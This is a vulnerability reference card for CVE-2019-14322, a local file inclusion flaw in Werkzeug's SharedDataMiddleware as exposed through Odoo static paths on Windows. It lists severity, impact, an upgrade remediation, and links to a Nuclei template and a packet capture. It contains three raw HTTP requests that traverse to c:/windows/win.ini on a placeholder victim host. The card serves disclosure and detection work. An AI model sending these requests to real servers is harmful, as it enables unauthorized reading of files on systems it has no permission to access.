| Title | Pallets Werkzeug <0.15.5 - Local File Inclusion |
|---|---|
| Author | madrobot |
| Severity | High |
| Impact | The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. |
| Remediation | Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.90059 |
| CVE ID | CVE-2019-14322 |
| CWE ID | CWE-22 |
| Shodan Query | cpe:"cpe:2.3:o:microsoft:windows" |
| Tags | cve cve2019 lfi odoo packetstorm palletsprojects microsoft vuln |
Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
GET /base_import/static/c:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /web/static/c:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /base/static/c:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-14322.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-14322.pcap
N/AN/A